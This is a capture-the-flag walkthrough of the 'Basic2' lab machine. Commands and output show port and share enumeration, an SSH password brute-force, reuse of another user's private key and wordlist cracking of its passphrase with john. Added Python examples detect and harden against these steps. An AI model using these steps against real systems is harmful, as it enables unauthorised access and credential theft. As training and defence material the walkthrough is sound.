The purpose of this machine is to allow us to practice web app hacking and privilege escalation.
I start by scanning ports with nmap, which tells me there are 6 open ports (22, 80, 139, 445, 8009, 8080).
guest@carattj
>> nmap -sC -sV -oN nmap_scan.txt [ip_address]
# Nmap 7.92 scan initiated Sun Feb 27 08:49:39 2022 as: nmap -sC -sV -oN nmap/initial 10.10.30.5
Nmap scan report for 10.10.30.5
Host is up (0.11s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_  256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
| ajp-methods:
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http        Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: -1s
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: basic2
|   NetBIOS computer name: BASIC2\x00
|   Domain name: \x00
|   FQDN: basic2
|_  System time: 2022-02-27T08:49:52-05:00
|_nbstat: NetBIOS name: BASIC2, NetBIOS user:, NetBIOS MAC: (unknown)
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2022-02-27T13:49:53
|_  start_date: N/A
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 27 08:49:57 2022 -- 1 IP address (1 host up) scanned in 18.96 seconds
Since HTTP port 80 is open, I open [ip_address]:80 in the browser and inspect the page using the developer tools. The page says there could be hidden pages, so I brute-force the site's directories using gobuster. We also have to provide a wordlist; luckily, Kali Linux ships with many of them.
guest@carattj
>> gobuster dir -u http://[ip_address] -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -o gobuster_scan.txt
/development (Status: 301) [Size: 314] [--> http://10.10.30.5/development/]
I found the hidden /development page, served by the Apache/2.4.18 server. Here, we can view two files, dev.txt and j.txt. They tell me the system is probably using easy passwords.
SMB services are running on ports 139 and 445. I enumerate them using enum4linux, and I discover that two usernames on the system are 'kay' and 'jan'.
guest@carattj
>> enum4linux -a [ip_address]
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb 27 12:01:30 2022

==========================
| Target Information |
==========================
Target ........... 10.10.128.212
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

=====================================================
| Enumerating Workgroup/Domain on 10.10.128.212 |
=====================================================
[+] Got domain/workgroup name: WORKGROUP

=============================================
| Nbtstat Information for 10.10.128.212 |
=============================================
Looking up status of 10.10.128.212
BASIC2 <00> - B Workstation Service
BASIC2 <03> - B Messenger Service
BASIC2 <20> - B File Server Service
..__MSBROWSE__. <01> - B Master Browser
WORKGROUP <00> - B Domain/Workgroup Name
WORKGROUP <1d> - B Master Browser
WORKGROUP <1e> - B Browser Service Elections
MAC Address = 00-00-00-00-00-00

======================================
| Session Check on 10.10.128.212 |
======================================
[+] Server 10.10.128.212 allows sessions using username '', password ''

============================================
| Getting domain SID for 10.10.128.212 |
============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

=======================================
| OS information on 10.10.128.212 |
=======================================
[+] Got OS info for 10.10.128.212 from smbclient:
[+] Got OS info for 10.10.128.212 from srvinfo:
BASIC2 Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
platform_id : 500
os version : 6.1
server type : 0x809a03

==============================
| Users on 10.10.128.212 |
==============================

==========================================
| Share Enumeration on 10.10.128.212 |
==========================================
Sharename       Type      Comment
---------       ----      -------
Anonymous       Disk
IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)
Reconnecting with SMB1 for workgroup listing.

Server               Comment
---------            -------

Workgroup            Master
---------            -------
WORKGROUP            BASIC2

[+] Attempting to map shares on 10.10.128.212
//10.10.128.212/Anonymous Mapping: OK, Listing: OK
//10.10.128.212/IPC$ [E] Can't understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

=====================================================
| Password Policy Information for 10.10.128.212 |
=====================================================
[+] Attaching to 10.10.128.212 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] BASIC2
[+] Builtin
[+] Password Info for Domain: BASIC2
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5

===============================
| Groups on 10.10.128.212 |
===============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:

========================================================================
| Users on 10.10.128.212 via RID cycling (RIDS: 500-550,1000-1050) |
========================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2853212168-2008227510-3551253869
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
...
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
...
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
...
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
...
S-1-5-21-2853212168-2008227510-3551253869-513 BASIC2\None (Domain Group)
...
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

==============================================
| Getting printer info for 10.10.128.212 |
==============================================
No printers returned.

enum4linux complete on Sun Feb 27 12:05:01 2022
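Added example (not part of the original walkthrough): a small parser that turns the enum4linux output above into the list of hardening findings an administrator of this server would care about. The sample lines are copied from the output on this page; the function names and the 8-character length threshold are assumptions of this example.

```python
import re

# Lines copied from the enum4linux output on this page (raw string keeps the backslashes).
SAMPLE = r"""
[+] Server 10.10.128.212 allows sessions using username '', password ''
//10.10.128.212/Anonymous Mapping: OK, Listing: OK
[+] Minimum password length: 5
[+] Account Lockout Threshold: None
[+] Domain Password Complex: 0
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-502 *unknown*\*unknown* (8)
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
"""

POLICY_RE = re.compile(
    r"\[\+\] (Minimum password length|Account Lockout Threshold|Domain Password Complex): (\S+)")
SHARE_RE = re.compile(r"//\S+?/(\S+)\s+Mapping: OK, Listing: OK")
USER_RE = re.compile(r"S-1-[\d-]+-(\d+) .+\\(\S+) \(Local User\)")


def parse_enum4linux(text):
    """Collect what the anonymous session disclosed."""
    report = {"null_session": False, "shares": [], "users": [], "policy": {}}
    for line in map(str.strip, text.splitlines()):
        if "allows sessions using username '', password ''" in line:
            report["null_session"] = True
        elif m := SHARE_RE.match(line):
            report["shares"].append(m[1])
        elif m := POLICY_RE.match(line):
            report["policy"][m[1]] = m[2]
        elif m := USER_RE.match(line):
            report["users"].append((m[2], int(m[1])))  # (account, RID)
    return report


def hardening_findings(report, min_length=8):
    """Turn the parsed leak into findings an administrator can act on."""
    policy, out = report["policy"], []
    if report["null_session"]:
        out.append("null session accepted: anonymous clients can query the server")
    for share in report["shares"]:
        out.append(f"share '{share}' is listable without credentials")
    if report["users"]:
        names = ", ".join(name for name, _ in report["users"])
        out.append(f"account names disclosed by RID cycling: {names}")
    length = policy.get("Minimum password length", "")
    if length.isdigit() and int(length) < min_length:  # threshold is this example's assumption
        out.append(f"minimum password length is {length} (< {min_length})")
    if policy.get("Account Lockout Threshold") == "None":
        out.append("no account lockout threshold: unlimited guesses")
    if policy.get("Domain Password Complex") == "0":
        out.append("password complexity not enforced")
    return out


if __name__ == "__main__":
    for finding in hardening_findings(parse_enum4linux(SAMPLE)):
        print("-", finding)
```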
Now that I know two usernames, and that an easy password is protecting the system, I brute-force the password. This time, I use hydra, providing a single user (-l), a list of passwords (-P), and the protocol I'm going to use. To use a list of users, I would have used -L, and for a single password, -p.
I get a match: the password of 'jan' is 'armando'.
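Added example (not part of the original walkthrough): what this password guessing looks like from the server side, and how to flag it from sshd's auth log. The log lines are constructed in the usual sshd syslog format; the source addresses, the threshold of 5 failures and the 5-minute window are assumptions of this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed auth.log lines in the usual sshd syslog format (not captured from the target).
SAMPLE_LOG = """\
Feb 27 12:20:01 basic2 sshd[2101]: Failed password for jan from 10.9.0.5 port 40001 ssh2
Feb 27 12:20:01 basic2 sshd[2102]: Failed password for jan from 10.9.0.5 port 40002 ssh2
Feb 27 12:20:02 basic2 sshd[2103]: Failed password for jan from 10.9.0.5 port 40003 ssh2
Feb 27 12:20:02 basic2 sshd[2104]: Failed password for jan from 10.9.0.5 port 40004 ssh2
Feb 27 12:20:03 basic2 sshd[2105]: Failed password for jan from 10.9.0.5 port 40005 ssh2
Feb 27 12:20:03 basic2 sshd[2106]: Failed password for jan from 10.9.0.5 port 40006 ssh2
Feb 27 12:20:04 basic2 sshd[2107]: Accepted password for jan from 10.9.0.5 port 40007 ssh2
Feb 27 12:31:10 basic2 sshd[2200]: Failed password for kay from 10.9.0.20 port 51000 ssh2
Feb 27 12:31:25 basic2 sshd[2201]: Accepted password for kay from 10.9.0.20 port 51002 ssh2
Feb 27 12:40:00 basic2 sshd[2300]: Failed password for invalid user admin from 10.9.0.5 port 40100 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_auth_log(text, year=2022):
    """Return sorted (timestamp, ip, user, accepted) tuples; syslog lines carry no year."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["ip"], m["user"], m["result"] == "Accepted"))
    return sorted(events)


def detect(events, threshold=5, window=timedelta(minutes=5)):
    """Flag bursts of failures per (ip, user) and any login that follows such a burst."""
    recent = defaultdict(list)  # (ip, user) -> failure timestamps still inside the window
    alerts = []
    for ts, ip, user, accepted in events:
        key = (ip, user)
        recent[key] = [t for t in recent[key] if ts - t <= window]
        if accepted:
            if len(recent[key]) >= threshold:
                # A success right after a burst means a guess worked: treat as compromise.
                alerts.append(("success_after_bruteforce", ip, user, len(recent[key])))
            recent[key].clear()
        else:
            recent[key].append(ts)
            if len(recent[key]) == threshold:  # alert once, when the threshold is crossed
                alerts.append(("bruteforce", ip, user, threshold))
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_auth_log(SAMPLE_LOG)):
        print(alert)
```

The single mistyped password for 'kay' stays below the threshold and raises nothing, while the burst against 'jan' raises both alerts. Setting `PasswordAuthentication no` in sshd_config removes this guessing path entirely.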
I connect to the server and navigate through the filesystem.
guest@carattj
>> ssh jan@[ip_address]
...
Inside the .ssh directory, there are 3 interesting files related to SSH public-key authentication.
In particular, there is the private key of the second user, 'kay', stored inside id_rsa.
I copy id_rsa to my machine as k_key, and I change its permissions so I can later use it for an SSH connection.
The key is protected by a password. To recover it, I use the John the Ripper tool: I look for the converter that turns the key into a hash john can read, and use john to find the password:
guest@carattj
>> chmod 600 k_key
...
>> locate ssh2john
...
>> python3 ssh2john.py k_key > k_key_john
...
>> john --wordlist=rockyou.txt k_key_john
...
The password for the ssh private key is 'beeswax'.
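Added example (not part of the original walkthrough): an audit an administrator could run to find private keys that other local accounts can read, and to tell whether each key is passphrase-protected. It assumes kay's id_rsa was readable by 'jan' because of loose file permissions, which the walkthrough does not state; the demo tree, key contents and function names are constructed for this example.

```python
import base64, glob, os, stat, struct, tempfile

MAGIC = b"openssh-key-v1\x00"  # header of the current OpenSSH private key format

def key_protection(text):
    """Return 'encrypted', 'plaintext', or None if text is not a private key."""
    lines = text.strip().splitlines()
    if not lines or not lines[0].startswith("-----BEGIN") or "PRIVATE KEY" not in lines[0]:
        return None
    if "OPENSSH" in lines[0]:
        # After the magic comes a length-prefixed cipher name; "none" means no passphrase.
        try:
            blob = base64.b64decode("".join(lines[1:-1]))
            (n,) = struct.unpack_from(">I", blob, len(MAGIC))
        except (ValueError, struct.error):
            return None
        if not blob.startswith(MAGIC):
            return None
        cipher = blob[len(MAGIC) + 4:len(MAGIC) + 4 + n]
        return "plaintext" if cipher == b"none" else "encrypted"
    # Legacy PEM flags encryption in a Proc-Type header, PKCS#8 in the BEGIN label.
    legacy = any(l.startswith("Proc-Type: 4,ENCRYPTED") for l in lines[1:4])
    return "encrypted" if legacy or "ENCRYPTED" in lines[0] else "plaintext"

def audit_ssh_dirs(home_root):
    """Return (user, file, protection, mode, exposed) for each private key found."""
    findings = []
    for path in sorted(glob.glob(os.path.join(home_root, "*", ".ssh", "*"))):
        user, _, name = path.split(os.sep)[-3:]
        try:
            with open(path, errors="replace") as fh:
                state = key_protection(fh.read(65536))
        except OSError:
            continue
        if state:
            mode = stat.S_IMODE(os.stat(path).st_mode)
            # exposed: readable by group or others, i.e. by another local account
            findings.append((user, name, state, oct(mode), bool(mode & 0o044)))
    return findings

def build_demo_tree(root):
    """Constructed layout: kay's encrypted key is world-readable, jan's is private."""
    legacy = ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n\n"
              "Q09OU1RSVUNURUQ=\n-----END RSA PRIVATE KEY-----\n")
    blob = base64.b64encode(MAGIC + struct.pack(">I", 4) + b"none").decode()
    modern = f"-----BEGIN OPENSSH PRIVATE KEY-----\n{blob}\n-----END OPENSSH PRIVATE KEY-----\n"
    for user, name, text, mode in [("kay", "id_rsa", legacy, 0o644),
                                   ("kay", "id_rsa.pub", "ssh-rsa AAAA constructed\n", 0o644),
                                   ("jan", "id_ed25519", modern, 0o600)]:
        path = os.path.join(root, user, ".ssh", name)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(text)
        os.chmod(path, mode)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as demo:
        build_demo_tree(demo)
        print(*audit_ssh_dirs(demo), sep="\n")
```

An exposed key that is encrypted is only as strong as its passphrase, which is why the wordlist run above succeeds; the fix is mode 600 on the key (and 700 on .ssh) plus a passphrase that is not in common wordlists.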
Finally, knowing the password, I connect as 'kay' using ssh, providing the private key as a command-line argument:
guest@carattj
>> ssh -i k_key kay@[ip_address]
...
Now I can read the pass.bak file inside kay's home directory, which contains the password flag to be captured.